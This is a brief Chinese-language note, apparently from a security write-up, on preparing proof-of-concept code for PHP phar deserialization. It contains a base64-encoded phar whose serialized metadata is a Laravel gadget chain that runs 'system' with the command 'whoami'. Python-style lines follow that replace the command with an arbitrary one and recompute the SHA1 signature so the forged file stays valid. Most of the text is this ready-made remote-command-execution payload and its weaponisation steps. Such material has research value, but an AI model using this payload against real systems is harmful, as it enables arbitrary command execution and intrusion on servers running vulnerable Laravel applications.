具体结构不细究,主要方便写poc代码,比如有如下文件内容:
文件内容如下:
file = base64.b64decode("PD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8+DQp9AQAAAQAAABEAAAABAAAAAABHAQAATzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjU6e3M6MTI6IgAqAGNvbnRhaW5lciI7TjtzOjExOiIAKgBwaXBlbGluZSI7TjtzOjg6IgAqAHBpcGVzIjthOjA6e31zOjExOiIAKgBoYW5kbGVycyI7YTowOnt9czoxNjoiACoAcXVldWVSZXNvbHZlciI7czo2OiJzeXN0ZW0iO31zOjg6IgAqAGV2ZW50IjtPOjM4OiJJbGx1bWluYXRlXEJyb2FkY2FzdGluZ1xCcm9hZGNhc3RFdmVudCI6MTp7czoxMDoiY29ubmVjdGlvbiI7czo2OiJ3aG9hbWkiO319CAAAAHRlc3QudHh0BAAAACpdBmYEAAAADH5/2KQBAAAAAAAAdGVzdO4PPAt4/NUWNWXWAzOoVlseOkFwAgAAAEdCTUI=")
反序列化的后28位中,最后8位固定,前20位为sha1(file[:-28]).digest()
data = file[:-28]
data = data.replace(b's:6:"whoami"',
b's:' + bytes(str(len(cmd)), encoding="utf-8") + b':"' + bytes(cmd, encoding='utf-8') + b'"')
final = file[-8:] # 后8位固定
所以最终如果要修改文件
newfile = data + sha1(data).digest() + final
